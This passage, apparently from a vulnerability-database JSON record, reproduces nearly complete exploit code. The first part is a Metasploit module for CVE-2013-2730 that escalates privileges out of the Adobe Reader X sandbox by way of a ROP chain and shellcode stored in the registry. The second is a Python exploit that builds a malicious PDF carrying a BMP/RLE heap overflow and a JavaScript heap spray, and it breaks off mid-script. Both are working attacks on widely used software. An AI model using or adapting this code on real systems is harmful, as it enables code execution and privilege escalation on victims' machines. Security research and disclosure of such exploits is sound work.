Integrity AcroRd32.exe\r\n process to write register values which can be used to trigger a buffer overflow on\r\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\r\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\r\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Felipe Andres Manzano', # Vulnerability discovery and PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2730' ],\r\n [ 'OSVDB', '93355' ],\r\n [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => 'meterpreter',\r\n 'Payload' =>\r\n {\r\n 'Space' => 12288,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Adobe Reader X 10.1.4 / Windows 7 SP1',\r\n {\r\n 'AdobeCollabSyncTrigger' => 0x18fa0,\r\n 'AdobeCollabSyncTriggerSignature' => \"\\x56\\x68\\xBC\\x00\\x00\\x00\\xE8\\xF5\\xFD\\xFF\\xFF\"\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate'=> 'May 14 2013'\r\n }))\r\n\r\n end\r\n\r\n def on_new_session\r\n print_status(\"Deleting Malicious Registry Keys...\")\r\n if not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\")\r\n print_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode by yourself\")\r\n end\r\n if not registry_deletekey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\")\r\n print_error(\"Delete HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB by yourself\")\r\n end\r\n print_status(\"Cleanup finished\")\r\n end\r\n\r\n # Test the process integrity level by trying to create a directory on the TEMP folder\r\n # Access should be granted with Medium Integrity Level\r\n # Access should be denied with Low Integrity Level\r\n # Usint this solution atm because I'm experiencing problems with railgun when trying\r\n # use GetTokenInformation\r\n def low_integrity_level?\r\n tmp_dir = expand_path(\"%TEMP%\")\r\n cd(tmp_dir)\r\n new_dir = \"#{rand_text_alpha(5)}\"\r\n begin\r\n session.shell_command_token(\"mkdir #{new_dir}\")\r\n rescue\r\n return true\r\n end\r\n\r\n if directory?(new_dir)\r\n session.shell_command_token(\"rmdir #{new_dir}\")\r\n return false\r\n else\r\n return true\r\n end\r\n end\r\n\r\n def check_trigger\r\n signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)\r\n if signature == target['AdobeCollabSyncTriggerSignature']\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def collect_addresses\r\n # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe\r\n @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']\r\n vprint_good(\"AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}\")\r\n\r\n # find kernel32.dll\r\n kernel32 = session.railgun.kernel32.GetModuleHandleA(\"kernel32.dll\")\r\n @addresses['kernel32.dll'] = kernel32[\"return\"]\r\n if @addresses['kernel32.dll'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find kernel32.dll\")\r\n end\r\n vprint_good(\"kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}\")\r\n\r\n # find kernel32.dll methods\r\n virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"VirtualAlloc\")\r\n @addresses['VirtualAlloc'] = virtual_alloc[\"return\"]\r\n if @addresses['VirtualAlloc'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find VirtualAlloc\")\r\n end\r\n vprint_good(\"VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}\")\r\n\r\n reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], \"RegGetValueA\")\r\n @addresses['RegGetValueA'] = reg_get_value[\"return\"]\r\n if @addresses['RegGetValueA'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find RegGetValueA\")\r\n end\r\n vprint_good(\"RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}\")\r\n\r\n # find ntdll.dll\r\n ntdll = session.railgun.kernel32.GetModuleHandleA(\"ntdll.dll\")\r\n @addresses['ntdll.dll'] = ntdll[\"return\"]\r\n if @addresses['ntdll.dll'] == 0\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find ntdll.dll\")\r\n end\r\n vprint_good(\"ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}\")\r\n end\r\n\r\n # Search a gadget identified by pattern on the process memory\r\n def search_gadget(base, offset_start, offset_end, pattern)\r\n mem = base + offset_start\r\n length = offset_end - offset_start\r\n mem_contents = session.railgun.memread(mem, length)\r\n return mem_contents.index(pattern)\r\n end\r\n\r\n # Search for gadgets on ntdll.dll\r\n def search_gadgets\r\n ntdll_text_base = 0x10000\r\n search_length = 0xd6000\r\n\r\n @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x89\\x0f\\xc3\")\r\n if @gadgets['mov [edi], ecx # ret'].nil?\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'mov [edi], ecx # ret'\")\r\n end\r\n @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']\r\n @gadgets['mov [edi], ecx # ret'] += ntdll_text_base\r\n vprint_good(\"Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}\")\r\n\r\n @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2\r\n vprint_good(\"Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}\")\r\n\r\n @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x5f\\xc3\")\r\n if @gadgets['pop edi # ret'].nil?\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'pop edi # ret'\")\r\n end\r\n @gadgets['pop edi # ret'] += @addresses['ntdll.dll']\r\n @gadgets['pop edi # ret'] += ntdll_text_base\r\n vprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}\")\r\n\r\n @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, \"\\x59\\xc3\")\r\n if @gadgets['pop ecx # ret'].nil?\r\n fail_with(Exploit::Failure::Unknown, \"Unable to find gadget 'pop ecx # ret'\")\r\n end\r\n @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']\r\n @gadgets['pop ecx # ret'] += ntdll_text_base\r\n vprint_good(\"Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}\")\r\n end\r\n\r\n def store(buf, data, address)\r\n i = 0\r\n while (i < data.length)\r\n buf << [@gadgets['pop edi # ret']].pack(\"V\")\r\n buf << [address + i].pack(\"V\") # edi\r\n buf << [@gadgets['pop ecx # ret']].pack(\"V\")\r\n buf << data[i, 4].ljust(4,\"\\x00\") # ecx\r\n buf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\")\r\n i = i + 4\r\n end\r\n return i\r\n end\r\n\r\n def create_rop_chain\r\n mem = 0x0c0c0c0c\r\n\r\n buf = [0x58000000 + 1].pack(\"V\")\r\n buf << [0x58000000 + 2].pack(\"V\")\r\n buf << [0].pack(\"V\")\r\n buf << [0x58000000 + 4].pack(\"V\")\r\n\r\n buf << [0x58000000 + 5].pack(\"V\")\r\n buf << [0x58000000 + 6].pack(\"V\")\r\n buf << [0x58000000 + 7].pack(\"V\")\r\n buf << [@gadgets['ret']].pack(\"V\")\r\n buf << rand_text(8)\r\n\r\n # Allocate Memory To store the shellcode and the necessary data to read the\r\n # shellcode stored in the registry\r\n buf << [@addresses['VirtualAlloc']].pack(\"V\")\r\n buf << [@gadgets['ret']].pack(\"V\")\r\n buf << [mem].pack(\"V\") # lpAddress\r\n buf << [0x00010000].pack(\"V\") # SIZE_T dwSize\r\n buf << [0x00003000].pack(\"V\") # DWORD flAllocationType\r\n buf << [0x00000040].pack(\"V\") # flProtect\r\n\r\n # Put in the allocated memory the necessary data in order to read the\r\n # shellcode stored in the registry\r\n # 1) The reg sub key: Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\r\n reg_key = \"Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\x00\"\r\n reg_key_length = store(buf, reg_key, mem)\r\n # 2) The reg entry: shellcode\r\n value_key = \"shellcode\\x00\"\r\n store(buf, value_key, mem + reg_key_length)\r\n # 3) The output buffer size: 0x3000\r\n size_buffer = 0x3000\r\n buf << [@gadgets['pop edi # ret']].pack(\"V\")\r\n buf << [mem + 0x50].pack(\"V\") # edi\r\n buf << [@gadgets['pop ecx # ret']].pack(\"V\")\r\n buf << [size_buffer].pack(\"V\") # ecx\r\n buf << [@gadgets['mov [edi], ecx # ret']].pack(\"V\")\r\n\r\n # Copy the shellcode from the the registry to the\r\n # memory allocated with executable permissions and\r\n # ret into there\r\n buf << [@addresses['RegGetValueA']].pack(\"V\")\r\n buf << [mem + 0x1000].pack(\"V\") # ret to shellcode\r\n buf << [0x80000001].pack(\"V\") # hkey => HKEY_CURRENT_USER\r\n buf << [mem].pack(\"V\") # lpSubKey\r\n buf << [mem + 0x3c].pack(\"V\") # lpValue\r\n buf << [0x0000FFFF].pack(\"V\") # dwFlags => RRF_RT_ANY\r\n buf << [0].pack(\"V\") # pdwType\r\n buf << [mem + 0x1000].pack(\"V\") # pvData\r\n buf << [mem + 0x50].pack(\"V\") # pcbData\r\n end\r\n\r\n # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry\r\n def store_data_registry(buf)\r\n vprint_status(\"Creating the Registry Key to store the shellcode...\")\r\n\r\n if registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\shellcode\")\r\n vprint_good(\"Registry Key created\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to create the Registry Key to store the shellcode\")\r\n end\r\n\r\n vprint_status(\"Storing the shellcode in the Registry...\")\r\n\r\n if registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"shellcode\", payload.encoded, \"REG_BINARY\")\r\n vprint_good(\"Shellcode stored\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to store shellcode in the Registry\")\r\n end\r\n\r\n # Create the Malicious registry entry in order to exploit....\r\n vprint_status(\"Creating the Registry Key to trigger the Overflow...\")\r\n if registry_createkey(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\\\\bDeleteDB\")\r\n vprint_good(\"Registry Key created\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to create the Registry Entry to trigger the Overflow\")\r\n end\r\n\r\n vprint_status(\"Storing the trigger in the Registry...\")\r\n if registry_setvaldata(\"HKCU\\\\Software\\\\Adobe\\\\Adobe Synchronizer\\\\10.0\\\\DBRecoveryOptions\", \"bDeleteDB\", buf, \"REG_BINARY\")\r\n vprint_good(\"Trigger stored\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to store the trigger in the Registry\")\r\n end\r\n end\r\n\r\n def trigger_overflow\r\n vprint_status(\"Creating the thread to trigger the Overflow on AdobeCollabSync.exe...\")\r\n # Create a thread in order to execute the necessary code to launch AdobeCollabSync\r\n ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, \"CREATE_SUSPENDED\", nil)\r\n if ret['return'] < 1\r\n print_error(\"Unable to CreateThread\")\r\n return\r\n end\r\n hthread = ret['return']\r\n\r\n vprint_status(\"Resuming the Thread...\")\r\n # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!\r\n ret = client.railgun.kernel32.ResumeThread(hthread)\r\n if ret['return'] < 1\r\n fail_with(Exploit::Failure::Unknown, \"Unable to ResumeThread\")\r\n end\r\n end\r\n\r\n def check\r\n @addresses = {}\r\n acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\")\r\n @addresses['AcroRd32.exe'] = acrord32[\"return\"]\r\n if @addresses['AcroRd32.exe'] == 0\r\n return Msf::Exploit::CheckCode::Unknown\r\n elsif check_trigger\r\n return Msf::Exploit::CheckCode::Vulnerable\r\n else\r\n return Msf::Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n def exploit\r\n @addresses = {}\r\n @gadgets = {}\r\n\r\n print_status(\"Verifying we're in the correct target process...\")\r\n acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\")\r\n @addresses['AcroRd32.exe'] = acrord32[\"return\"]\r\n if @addresses['AcroRd32.exe'] == 0\r\n fail_with(Exploit::Failure::NoTarget, \"AcroRd32.exe process not found\")\r\n end\r\n vprint_good(\"AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}\")\r\n\r\n print_status(\"Checking the AcroRd32.exe image...\")\r\n if not check_trigger\r\n fail_with(Exploit::Failure::NoTarget, \"Please check the target, the AcroRd32.exe process doesn't match with the target\")\r\n end\r\n\r\n print_status(\"Checking the Process Integrity Level...\")\r\n if not low_integrity_level?\r\n fail_with(Exploit::Failure::NoTarget, \"Looks like you don't need this Exploit since you're already enjoying Medium Level\")\r\n end\r\n\r\n print_status(\"Collecting necessary addresses for exploit...\")\r\n collect_addresses\r\n\r\n print_status(\"Searching the gadgets needed to build the ROP chain...\")\r\n search_gadgets\r\n print_good(\"Gadgets collected...\")\r\n\r\n print_status(\"Building the ROP chain...\")\r\n buf = create_rop_chain\r\n print_good(\"ROP chain ready...\")\r\n\r\n print_status(\"Storing the shellcode and the trigger in the Registry...\")\r\n store_data_registry(buf)\r\n\r\n print_status(\"Executing AdobeCollabSync.exe...\")\r\n trigger_overflow\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25725/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:21", "bulletinFamily": "exploit", "description": "", "modified": "2013-07-08T00:00:00", "published": "2013-07-08T00:00:00", "href": "https://packetstormsecurity.com/files/122309/Adobe-Reader-X-10.1.4.38-BMP-RLE-Heap-Corruption.html", "id": "PACKETSTORM:122309", "type": "packetstorm", "title": "Adobe Reader X 10.1.4.38 BMP/RLE Heap Corruption", "sourceData": "`''' \nTitle: Adobe Reader X BMP/RLE heap corruption \nProduct: Adobe Reader X \nVersion: 10.x \nProduct Homepage: adobe.com \nBinary affected: AcroForm.api \nBinary Version: 10.1.4.38 \nBinary MD5: 8e0fc0c6f206b84e265cc3076c4b9841 \nConfiguration Requirements \n----------------------------------------- \nDefault configuration. \n \nVulnerability Requirements \n----------------------------------------- \nNone. \n \nVulnerability Description \n----------------------------------------- \nAdobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow. \n \n \nVulnerability WorkAround (if possible) \n----------------------------------------- \nDelete AcroForm.api \n''' \nfrom hashlib import md5 \nimport sys, struct \n######### Begin of the miniPDF \nimport zlib \n \n#For constructing a minimal pdf file \n## PDF REference 3rd edition:: 3.2 Objects \nclass PDFObject: \ndef __init__(self): \nself.n=None \nself.v=None \ndef __str__(self): \nraise Exception(\"Fail\") \n \n## PDF REference 3rd edition:: 3.2.1 Booleans Objects \nclass PDFBool(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nself.s=s \ndef __str__(self): \nif self.s: \nreturn \"true\" \nreturn \"false\" \n \n## PDF REference 3rd edition:: 3.2.2 Numeric Objects \nclass PDFNum(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nself.s=s \ndef __str__(self): \nreturn \"%s\"%self.s \n \n## PDF REference 3rd edition:: 3.2.3 String Objects \nclass PDFString(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nself.s=s \ndef __str__(self): \nreturn \"(%s)\"%self.s \n \n## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings \nclass PDFHexString(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nself.s=s \ndef __str__(self): \nreturn \"<\" + \"\".join([\"%02x\"%ord(c) for c in self.s]) + \">\" \n \n## A convenient type of literal Strings \nclass PDFOctalString(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nself.s=\"\".join([\"\\\\%03o\"%ord(c) for c in s]) \ndef __str__(self): \nreturn \"(%s)\"%self.s \n \n## PDF REference 3rd edition:: 3.2.4 Name Objects \nclass PDFName(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nself.s=s \ndef __str__(self): \nreturn \"/%s\"%self.s \n \n## PDF REference 3rd edition:: 3.2.5 Array Objects \nclass PDFArray(PDFObject): \ndef __init__(self,s): \nPDFObject.__init__(self) \nassert type(s) == type([]) \nself.s=s \ndef append(self,o): \nself.s.append(o) \nreturn self \ndef __str__(self): \nreturn \"[%s]\"%(\" \".join([ o.__str__() for o in self.s])) \n \n## PDF REference 3rd edition:: 3.2.6 Dictionary Objects \nclass PDFDict(PDFObject): \ndef __init__(self, d={}): \nPDFObject.__init__(self) \nself.dict = {} \nfor k in d: \nself.dict[k]=d[k] \n \ndef __iter__(self): \nfor k in self.dict.keys(): \nyield k \n \ndef __iterkeys__(self): \nfor k in self.dict.keys(): \nyield k \n \ndef __getitem__(self, key): \nreturn self.dict[key] \n \ndef add(self,name,obj): \nself.dict[name] = obj \n \ndef get(self,name): \nif name in self.dict.keys(): \nreturn self.dict[name] \nelse: \nreturn None \n \ndef __str__(self): \ns=\"<<\" \nfor name in self.dict: \ns+=\"%s %s \"%(PDFName(name),self.dict[name]) \ns+=\">>\" \nreturn s \n \n## PDF REference 3rd edition:: 3.2.7 Stream Objects \nclass PDFStream(PDFDict): \ndef __init__(self,d={},stream=\"\"): \nPDFDict.__init__(self,d) \nself.stream=stream \nself.filtered=self.stream \nself.add('Length', len(stream)) \nself.filters = [] \n \ndef appendFilter(self, filter): \nself.filters.append(filter) \nself._applyFilters() #yeah every time .. so what! \n \ndef _applyFilters(self): \nself.filtered = self.stream \nfor f in self.filters: \nself.filtered = f.encode(self.filtered) \nif len(self.filters)>0: \nself.add('Length', len(self.filtered)) \nself.add('Filter', PDFArray([f.name for f in self.filters])) \n#Add Filter parameters ? \ndef __str__(self): \nself._applyFilters() #yeah every time .. so what! \ns=\"\" \ns+=PDFDict.__str__(self) \ns+=\"\\nstream\\n\" \ns+=self.filtered \ns+=\"\\nendstream\" \nreturn s \n \n## PDF REference 3rd edition:: 3.2.8 Null Object \nclass PDFNull(PDFObject): \ndef __init__(self): \nPDFObject.__init__(self) \n \ndef __str__(self): \nreturn \"null\" \n \n \n## PDF REference 3rd edition:: 3.2.9 Indirect Objects \nclass UnResolved(PDFObject): \ndef __init__(self,n,v): \nPDFObject.__init__(self) \nself.n=n \nself.v=v \ndef __str__(self): \nreturn \"UNRESOLVED(%d %d)\"%(self.n,self.v) \nclass PDFRef(PDFObject): \ndef __init__(self,obj): \nPDFObject.__init__(self) \nself.obj=[obj] \ndef __str__(self): \nif len(self.obj)==0: \nreturn \"null\" \nreturn \"%d %d R\"%(self.obj[0].n,self.obj[0].v) \n \n## PDF REference 3rd edition:: 3.3 Filters \n## Example Filter... \nclass FlateDecode: \nname = PDFName('FlateDecode') \ndef __init__(self): \npass \ndef encode(self,stream): \nreturn zlib.compress(stream) \ndef decode(self,stream): \nreturn zlib.decompress(stream) \n \n## PDF REference 3rd edition:: 3.4 File Structure \n## Simplest file structure... \nclass PDFDoc(): \ndef __init__(self,obfuscate=0): \nself.objs=[] \nself.info=None \nself.root=None \ndef setRoot(self,root): \nself.root=root \ndef setInfo(self,info): \nself.info=info \ndef _add(self,obj): \nif obj.v!=None or obj.n!=None: \nraise Exception(\"Already added!!!\") \nobj.v=0 \nobj.n=1+len(self.objs) \nself.objs.append(obj) \ndef add(self,obj): \nif type(obj) != type([]): \nself._add(obj); \nelse: \nfor o in obj: \nself._add(o) \ndef _header(self): \nreturn \"%PDF-1.5\\n%\\xE7\\xF3\\xCF\\xD3\\n\" \ndef __str__(self): \ndoc1 = self._header() \nxref = {} \nfor obj in self.objs: \nxref[obj.n] = len(doc1) \ndoc1+=\"%d %d obj\\n\"%(obj.n,obj.v) \ndoc1+=obj.__str__() \ndoc1+=\"\\nendobj\\n\" \nposxref=len(doc1) \ndoc1+=\"xref\\n\" \ndoc1+=\"0 %d\\n\"%(len(self.objs)+1) \ndoc1+=\"0000000000 65535 f \\n\" \nfor xr in xref.keys(): \ndoc1+= \"%010d %05d n \\n\"%(xref[xr],0) \ndoc1+=\"trailer\\n\" \ntrailer = PDFDict() \ntrailer.add(\"Size\",len(self.objs)+1) \nif self.root == None: \nraise Exception(\"Root not set!\") \ntrailer.add(\"Root\",PDFRef(self.root)) \nif self.info: \ntrailer.add(\"Info\",PDFRef(self.info)) \ndoc1+=trailer.__str__() \ndoc1+=\"\\nstartxref\\n%d\\n\"%posxref \ndoc1+=\"%%EOF\" \nreturn doc1 \n######### End of miniPDF \n \nSLIDESIZE=0x12C \n \ndef mkBMP(payload, exception=True): \nbmp = '' \n#getInfoHeader \nbfType = 0x4d42 \nassert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp \nbmp += struct.pack('<H', bfType) \n \nbfSize = 0 \nbfOffBits = 0 \nbmp += struct.pack('<L', bfSize) \nbmp += struct.pack('<H', 0) #Reserved1 \nbmp += struct.pack('<H', 0) #Reserved2 \nbmp += struct.pack('<L', bfOffBits) \n \n \nbiSize = 0x40 \nassert not biSize in [0x12] \nbmp += struct.pack('<L', biSize) \n \n \nbiHeight = 1 \nbiWidth = SLIDESIZE #size of texture structure LFH enabled \nbiPlanes = 1 \nbiBitCount = 8 \nbiCompression = 1 \nbiSizeImage = 0 \nbiXPelsPerMeter = 0 \nbiYPelsPerMeter = 0 \nbiClrUsed = 2 \nif biClrUsed >0xff: \nraise \"BUG!!!!\" \n \nbiClrImportant = 0 \nbmp += struct.pack('<L', biWidth) \nbmp += struct.pack('<L', biHeight) \nbmp += struct.pack('<H', biPlanes) \nbmp += struct.pack('<H', biBitCount) \nbmp += struct.pack('<L', biCompression) \nbmp += struct.pack('<L', biSizeImage) \nbmp += struct.pack('<L', biXPelsPerMeter) \nbmp += struct.pack('<L', biYPelsPerMeter) \nbmp += struct.pack('<L', biClrUsed) \nbmp += struct.pack('<L', biClrImportant) \nbmp += 'A'*(biSize-0x40) #pad \n \nnumColors=biClrUsed \nif biClrUsed == 0 or biBitCount < 8: \nnumColors = 1<<biBitCount; \n \nbmp += 'RGBA'*(numColors) #pallete \n \nbmp += '\\x00\\x02\\xff\\x00' * ((0xffffffff-0xff) / 0xff) \n \n#while (len(bmp)+10)%0x400 != 0: \n# bmp += '\\x00\\x02\\x00\\x00' \n \nassert len(payload) < 0x100 and len(payload) >= 3 \n \n \nbmp += '\\x00\\x02'+chr(0x100-len(payload))+'\\x00' \nbmp += '\\x00'+chr(len(payload))+payload \n \nif len(payload)&1 : \nbmp += 'P' \n \nif exception: \nbmp += '\\x00\\x02\\x00\\xff'*10 #getting the pointer outside the texture so it triggers an exception \nbmp += '\\x00'+chr(10)+'X'*10 \nelse: \nbmp += '\\x00\\x01' \n#'\\x04X'*(biWidth+2000)+\"\\x00\\x02\" \nreturn bmp \n \ndef UEncode(s): \nr = '' \ns += '\\x00'*(len(s)%2) \nfor i in range(0,len(s),2): \nr+= '\\\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0]) \nreturn r \nr = '' \nfor c in s: \nr+= '%%%02x'%ord(c) \nreturn r \n \n \ndef mkXFAPDF(shellcode = '\\x90'*0x400+'\\xcc'): \nxdp = ''' \n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\" timeStamp=\"2012-11-23T13:41:54Z\" uuid=\"0aa46f9b-2c50-42d4-ab0b-1a1015321da7\"> \n<template xmlns:xfa=\"http://www.xfa.org/schema/xfa-template/3.1/\" xmlns=\"http://www.xfa.org/schema/xfa-template/3.0/\"> \n<?formServer defaultPDFRenderFormat acrobat9.1static?> \n<?formServer allowRenderCaching 0?> \n<?formServer formModel both?> \n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\" restoreState=\"auto\"> \n<pageSet> \n<pageArea name=\"Page1\" id=\"Page1\"> \n<contentArea x=\"0.25in\" y=\"0.25in\" w=\"576pt\" h=\"756pt\"/> \n<medium stock=\"default\" short=\"612pt\" long=\"792pt\"/> \n<?templateDesigner expand 1?> \n</pageArea> \n<?templateDesigner expand 1?> \n</pageSet> \n<variables> \n<script name=\"util\" contentType=\"application/x-javascript\"> \n// Convenience functions to pack and unpack litle endian an utf-16 strings \nfunction pack(i){ \nvar low = (i & 0xffff); \nvar high = ((i>>16) & 0xffff); \nreturn String.fromCharCode(low)+String.fromCharCode(high); \n} \nfunction unpackAt(s, pos){ \nreturn s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16); \n} \nfunction packs(s){ \nresult = \"\"; \nfor (i=0;i<s.length;i+=2) \nresult += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8)); \nreturn result; \n} \nfunction packh(s){ \nreturn String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16)); \n} \nfunction packhs(s){ \nresult = \"\"; \nfor (i=0;i<s.length;i+=4) \nresult += packh(s.slice(i,i+4)); \nreturn result; \n} \nvar verbose = 1; \nfunction message(x){ \nif (util.verbose == 1 ) \nxfa.host.messageBox(x); \n} \n \n//ROP0 \n//7201E63D XCHG EAX,ESP \n//7201E63E RETN \n//ROP1 \n//7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle] \n//ROP2 \n//7238EF5C PUSH EAX \n//7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress] \n//7238EF63 TEST EAX,EAX \n//7238EF65 JNE SHORT 7238EF84 \n//7238EF84 POP EBP \n//7238EF85 RETN 4 \n//ROP3 \n//72001186 JMP EAX ; kernel32.VirtualProtect \n//ROP4 \n//72242491 ADD ESP,70 \n//72242494 RETN \n \n \nvar _offsets = {'Reader\": { \"10.104\": { \n\"acrord32\": 0xA4, \n\"rop0\": 0x1E63D, \n\"rop1\": 0x100A, \n\"rop2\": 0x38EF5C, \n\"rop3\": 0x1186, \n\"rop4\": 0x242491, \n}, \n\"10.105\": { // Added by Eddie Mitchell \n\"acrord32\": 0xA5, \n\"rop0\": 0x1E52D, \n\"rop1\": 0x100A, \n\"rop2\": 0x393526, \n\"rop3\": 0x1186, \n\"rop4\": 0x245E71, \n}, \n\"10.106\": { // Added by Eddie Mitchell \n\"acrord32\": 0xA5, \n\"rop0\": 0x1E52D, \n\"rop1\": 0x100A, \n\"rop2\": 0x393526, \n\"rop3\": 0x1186, \n\"rop4\": 0x245E71, \n}, \n}, \n\"Exchange-Pro\": { \n\"10.105\": { // Added by Eddie Mitchell \n\"acrobat\": 0xCD, \n\"rop0\": 0x3720D, \n\"rop1\": 0x100A, \n\"rop2\": 0x3DCC91, \n\"rop3\": 0x180F, \n\"rop4\": 0x25F2A1, \n}, \n}, \n}; \n \nfunction offset(x){ \n//app.viewerType will be \"Reader\" for Reader, \n//\"Exchange\" for Acrobat Standard or \"Exchange-Pro\" for Acrobat Pro \ntry { \nreturn _offsets[app.viewerType][app.viewerVersion][x]; \n} \ncatch (e) { \nxfa.host.messageBox(\"Type:\" +app.viewerType+ \" Version: \"+app.viewerVersion+\" NOT SUPPORTED!\"); \n} \nreturn 0x41414141; \n} \n \n</script> \n<script name=\"spray\" contentType=\"application/x-javascript\"> \n// Global variable for spraying \nvar slide_size=%%SLIDESIZE%%; \nvar size = 200; \nvar chunkx = \"%%MINICHUNKX%%\"; \nvar x = new Array(size); \nvar y = new Array(size); \nvar z = new Array(size); \nvar pointers = new Array(100); \nvar done = 0; \n</script> \n<?templateDesigner expand 1?> \n</variables> \n<subform w=\"576pt\" h=\"756pt\"> \n \n<field name=\"ImageCrash\"> \n<ui> <imageEdit/> </ui> \n<value> \n<image aspect=\"actual\" contentType=\"image/jpeg\">%%BMPFREELFH%%</image> \n</value> \n</field> \n</subform> \n<event activity=\"initialize\" name=\"event__initialize\"> \n<script contentType=\"application/x-javascript\"> \n// This script runs at the very beginning and \n// is used to prepare the memory layout \nutil.message(\"Initialize\"); \nvar i; var j; \nif (spray.done == 0){ \n//Trigger LFH use \nvar TOKEN = \"\\u5858\\u5858\\u5678\\u1234\"; \nvar chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2); \n \nfor (i=0; i < spray.size; i+=1) \nspray.x[i] = TOKEN + util.pack(i) + \nspray.chunkx.substring(0, chunk_len) + \nutil.pack(i) + \"\"; \n \nutil.message(\"Initial spray done!\"); \nfor (j=0; j < size; j++) \nfor (i=spray.size-1; i > spray.size/4; i-=10) \nspray.x[i]=null; \n 